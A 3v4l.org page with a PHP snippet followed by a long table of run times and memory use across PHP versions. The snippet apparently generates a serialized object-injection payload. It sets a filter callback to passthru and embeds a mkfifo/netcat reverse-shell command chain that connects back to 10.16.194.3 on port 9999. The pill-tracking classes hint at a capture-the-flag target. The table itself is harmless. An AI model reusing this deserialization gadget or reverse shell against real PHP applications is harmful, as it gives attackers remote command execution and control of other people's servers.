3v4l.org

run code in 300+ PHP versions simultaneously
<?php class User{ var $username; var $created; var $actions = ["rm -f /tmp/f", "mkfifo /tmp/f", "cat /tmp/f | /bin/sh -i 2>&1 | nc 10.16.194.3 9999 > /tmp/f " ]; var $sort; var $filterby=passthru; var $filtervalue="hii"; function __construct($username){ $this->username = $username; $this->created = new DateTime(null); $this->sort = "User::action_sort_name"; $this->filterby=null; $this->filtervalue=null; } function get_username(){ return $this->username; } function add_action($pillname){ array_push($this->actions, new Action($pillname) ); } function set_sort_method($sort_name){ $this->sort = $sort_name; } function get_sort_method(){ return $this->sort; } function sort_actions(){ usort($this->actions, $this->sort); } function get_display_actions(){ if ($this->filtervalue != null){ $res = array_filter($this->actions, $this->filterby); $pr = print_r($res, true); return $res; } return $this->actions; } function get_pill_names(){ $pill_names = array(); foreach($this->actions as $action){ array_push($pill_names, $action->pillname); } return array_unique($pill_names); } function set_filtervalue($val){ $this->filtervalue = $val; } function set_filterby($val){ $this->filterby = $val; } public function action_filter_name($a){ $res = ($a->pillname == $this->filtervalue); return $res; } public function action_filter_time($a){ /* before this time */ if ($a > $this->filtervalue){ return true; } } public static function action_sort_name($a, $b){ if ($a->pillname == $b->pillname){ return 0; } return ($a->pillname < $b->pillname) ? -1 : 1 ; } public static function action_sort_date($a, $b){ if ($a->datetime == $b->datetime){ return 0; } return ($a->datetime < $b->datetime) ? -1 : 1 ; } } class Action{ var $pillname; var $datetime; function __construct($pillname){ $this->pillname = $pillname; $this->datetime = new DateTime(null); } } print serialize(new User('tryagain')) ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0140.00416.72
8.3.50.0140.00521.91
8.3.40.0090.00618.83
8.3.30.0110.00418.70
8.3.20.0030.00520.34
8.3.10.0080.00023.51
8.3.00.0060.00319.51
8.2.180.0040.01116.63
8.2.170.0130.00722.96
8.2.160.0100.00320.52
8.2.150.0030.00524.18
8.2.140.0000.00824.66
8.2.130.0060.00317.37
8.2.120.0000.00726.35
8.2.110.0050.00521.00
8.2.100.0090.00317.80
8.2.90.0080.00019.09
8.2.80.0050.00317.97
8.2.70.0140.00518.75
8.2.60.0120.00618.30
8.2.50.0190.00018.45
8.2.40.0150.00218.61
8.2.30.0110.00718.96
8.2.20.0000.01518.39
8.2.10.0110.00618.77
8.2.00.0110.00518.69
8.1.280.0080.00825.92
8.1.270.0060.01023.76
8.1.260.0040.00428.09
8.1.250.0040.00428.09
8.1.240.0100.00722.19
8.1.230.0120.00017.53
8.1.220.0050.00317.74
8.1.210.0080.00018.77
8.1.200.0130.00418.25
8.1.190.0140.00218.29
8.1.180.0140.00318.25
8.1.170.0140.00218.25
8.1.160.0120.00418.25
8.1.150.0110.00518.25
8.1.140.0120.00318.42
8.1.130.0140.00418.25
8.1.120.0160.00018.55
8.1.110.0120.00418.25
8.1.100.0060.01018.52
8.1.90.0150.00019.59
8.1.80.0100.00718.39
8.1.70.0120.00418.38
8.1.60.0150.00218.66
8.1.50.0140.00318.33
8.1.40.0160.00018.50
8.1.30.0040.00420.39
8.1.20.0110.00418.52
8.1.10.0030.00620.36
8.1.00.0040.00420.36
8.0.300.0000.00818.77
8.0.290.0070.00718.25
8.0.280.0000.00819.83
8.0.270.0110.00418.25
8.0.260.0060.00319.68
8.0.250.0120.00018.25
8.0.240.0030.00619.88
8.0.230.0000.00919.81
8.0.220.0130.00018.25
8.0.210.0030.00619.49
8.0.200.0000.00919.70
8.0.190.0090.00618.25
8.0.180.0040.00419.75
8.0.170.0100.00518.25
8.0.160.0060.00319.71
8.0.150.0110.00518.25
8.0.140.0060.00319.75
8.0.130.0030.00619.68
8.0.120.0070.00718.25
8.0.110.0020.00719.74
8.0.100.0090.00418.25
8.0.90.0050.00518.25
8.0.80.0040.00419.61
8.0.70.0130.00318.25
8.0.60.0090.00019.83
8.0.50.0120.00318.25
8.0.30.0060.00319.64
8.0.20.0120.00418.25
8.0.10.0110.00418.25
8.0.00.0160.00018.25
7.4.330.0130.00018.25
7.4.320.0140.00318.25
7.4.300.0120.00418.25
7.4.290.0080.00818.25
7.4.280.0050.01118.25
7.4.270.0110.00518.25
7.4.260.0110.00518.25
7.4.250.0110.00618.25
7.4.240.0150.00018.25
7.4.230.0120.00318.25
7.4.220.0000.01518.25
7.4.210.0120.00318.25
7.4.200.0120.00518.25
7.4.190.0060.00918.25
7.4.180.0100.00518.25
7.4.160.0110.00418.25
7.4.150.0100.00518.25
7.4.140.0150.00318.25
7.4.130.0110.00518.25
7.4.120.0000.01518.25
7.4.110.0140.00018.25
7.4.100.0100.00718.25
7.4.90.0100.00318.25
7.4.80.0110.00318.25
7.4.70.0150.00018.25
7.4.60.0150.00018.25
7.4.50.0090.00618.25
7.4.40.0080.00818.25
7.4.30.0040.01118.25
7.4.20.0090.00518.25
7.4.10.0120.00318.25
7.4.00.0110.00418.25
7.3.330.0090.00618.25
7.3.320.0120.00418.25
7.3.310.0120.00318.25
7.3.300.0050.01018.25
7.3.290.0120.00318.25
7.3.280.0120.00318.25
7.3.270.0120.00318.25
7.3.260.0150.00018.25
7.3.250.0070.00718.25
7.3.240.0090.00618.25
7.3.230.0110.00418.25
7.3.220.0040.01218.25
7.3.210.0150.00018.25
7.3.200.0130.00418.25
7.3.190.0120.00318.25
7.3.180.0150.00018.25
7.3.170.0080.00818.25
7.3.160.0100.00518.25
7.3.150.0110.00618.25
7.3.140.0150.00018.25
7.3.130.0130.00318.25
7.3.120.0120.00318.25
7.3.110.0150.00018.25
7.3.100.0100.00518.25
7.3.90.0080.00818.25
7.3.80.0090.00518.25
7.3.70.0080.00618.25
7.3.60.0090.00618.25
7.3.50.0120.00418.25
7.3.40.0120.00418.25
7.3.30.0040.01218.25
7.3.20.0120.00319.17
7.3.10.0150.00019.00
7.3.00.0130.00318.84
7.2.340.0120.00418.25
7.2.330.0100.00518.25
7.2.320.0080.00818.25
7.2.310.0150.00018.25
7.2.300.0110.00518.25
7.2.290.0080.00818.25
7.2.280.0040.01118.25
7.2.270.0160.00018.25
7.2.260.0080.00818.25
7.2.250.0080.00818.25
7.2.240.0100.00518.25
7.2.230.0080.00818.25
7.2.220.0120.00418.25
7.2.210.0100.00518.25
7.2.200.0080.00818.25
7.2.190.0130.00218.25
7.2.180.0110.00418.25
7.2.170.0040.01118.25
7.2.160.0100.00518.25
7.2.150.0130.00319.28
7.2.140.0150.00019.40
7.2.130.0100.00519.55
7.2.120.0110.00419.42
7.2.110.0150.00019.45
7.2.100.0160.00019.33
7.2.90.0060.00919.37
7.2.80.0150.00019.41
7.2.70.0130.00319.55
7.2.60.0100.00519.52
7.2.50.0110.00419.58
7.2.40.0090.00619.12
7.2.30.0050.01019.27
7.2.20.0100.00519.48
7.2.10.0110.00419.26
7.2.00.0150.00019.38
7.1.330.0110.00418.40
7.1.320.0110.00418.48
7.1.310.0090.00518.25
7.1.300.0100.00318.48
7.1.290.0110.00318.25
7.1.280.0110.00418.25
7.1.270.0080.00618.47
7.1.260.0120.00318.35
7.1.250.0090.00518.25
7.1.240.0110.00418.25
7.1.230.0070.00718.25
7.1.220.0090.00618.50
7.1.210.0100.00318.33
7.1.200.0120.00218.25
7.1.190.0150.00018.64
7.1.180.0050.00918.25
7.1.170.0100.00418.26
7.1.160.0140.00018.25
7.1.150.0140.00018.25
7.1.140.0120.00418.50
7.1.130.0100.00518.34
7.1.120.0100.00318.25
7.1.110.0140.00018.32
7.1.100.0090.00518.25
7.1.90.0100.00518.25
7.1.80.0070.00718.28
7.1.70.0100.00418.30
7.1.60.0140.00018.46
7.1.50.0110.00418.35
7.1.40.0080.00618.36
7.1.30.0130.00318.34
7.1.20.0070.00718.25
7.1.10.0160.00018.25
7.1.00.0150.00018.25
7.0.330.0100.00518.25
7.0.320.0090.00618.25
7.0.310.0120.00318.25
7.0.300.0130.00018.25
7.0.290.0090.00418.25
7.0.280.0090.00518.34
7.0.270.0080.00518.25
7.0.260.0060.00618.25
7.0.250.0070.00718.25
7.0.240.0130.00018.25
7.0.230.0100.00318.25
7.0.220.0110.00318.25
7.0.210.0100.00518.25
7.0.200.0100.00318.25
7.0.190.0140.00018.25
7.0.180.0080.00518.25
7.0.170.0070.00718.25
7.0.160.0100.00318.25
7.0.150.0070.00718.25
7.0.140.0090.00518.25
7.0.130.0060.00918.25
7.0.120.0070.00718.25
7.0.110.0100.00418.25
7.0.100.0070.00718.25
7.0.90.0110.00318.25
7.0.80.0120.00218.25
7.0.70.0150.00018.25
7.0.60.0090.00518.25
7.0.50.0140.00018.25
7.0.40.0130.00018.25
7.0.30.0100.00418.25
7.0.20.0090.00418.25
7.0.10.0100.00318.25
7.0.00.0130.00018.25
5.6.400.0100.00318.25
5.6.390.0140.00018.25
5.6.380.0080.00818.25
5.6.370.0090.00618.25
5.6.360.0090.00518.25
5.6.350.0110.00318.25
5.6.340.0140.00018.25
5.6.330.0040.00918.25
5.6.320.0070.00718.25
5.6.310.0120.00218.25
5.6.300.0100.00318.25
5.6.290.0110.00418.25
5.6.280.0070.00718.25
5.6.270.0100.00318.25
5.6.260.0140.00018.25
5.6.250.0080.00518.25
5.6.240.0080.00518.25
5.6.230.0130.00018.25
5.6.220.0110.00218.25
5.6.210.0100.00318.25
5.6.200.0130.00018.25
5.6.190.0130.00018.25
5.6.180.0080.00618.25
5.6.170.0130.00018.25
5.6.160.0060.00618.25
5.6.150.0070.00718.25
5.6.140.0140.00018.25
5.6.130.0080.00518.25
5.6.120.0110.00418.25
5.6.110.0090.00418.25
5.6.100.0070.00718.25
5.6.90.0150.00018.25
5.6.80.0090.00418.25
5.6.70.0130.00018.25
5.6.60.0090.00418.25
5.6.50.0110.00318.25
5.6.40.0100.00318.25
5.6.30.0060.00618.25
5.6.20.0120.00018.25
5.6.10.0090.00318.25
5.6.00.0100.00318.25
5.5.380.0070.00718.25
5.5.370.0000.01318.25
5.5.360.0050.00818.25
5.5.350.0140.00018.25
5.5.340.0120.00218.25
5.5.330.0030.01018.25
5.5.320.0070.00718.25
5.5.310.0000.01318.25
5.5.300.0070.00718.25
5.5.290.0140.00018.25
5.5.280.0130.00018.25
5.5.270.0090.00518.25
5.5.260.0090.00518.25
5.5.250.0120.00218.25
5.5.240.0100.00318.25
5.5.230.0090.00318.25
5.5.220.0030.01018.25
5.5.210.0120.00018.25
5.5.200.0030.01018.25
5.5.190.0060.00618.25
5.5.180.0130.00018.25
5.5.170.0030.01018.25
5.5.160.0090.00518.25
5.5.150.0070.00718.25
5.5.140.0080.00418.25
5.5.130.0080.00518.25
5.5.120.0070.00518.25
5.5.110.0090.00518.25
5.5.100.0060.00618.25
5.5.90.0140.00018.25
5.5.80.0090.00318.25
5.5.70.0100.00218.25
5.5.60.0110.00318.25
5.5.50.0090.00418.25
5.5.40.0090.00518.25
5.5.30.0090.00518.25
5.5.20.0090.00418.25
5.5.10.0040.00818.25
5.5.00.0000.01218.25

preferences:
47.51 ms | 401 KiB | 5 Q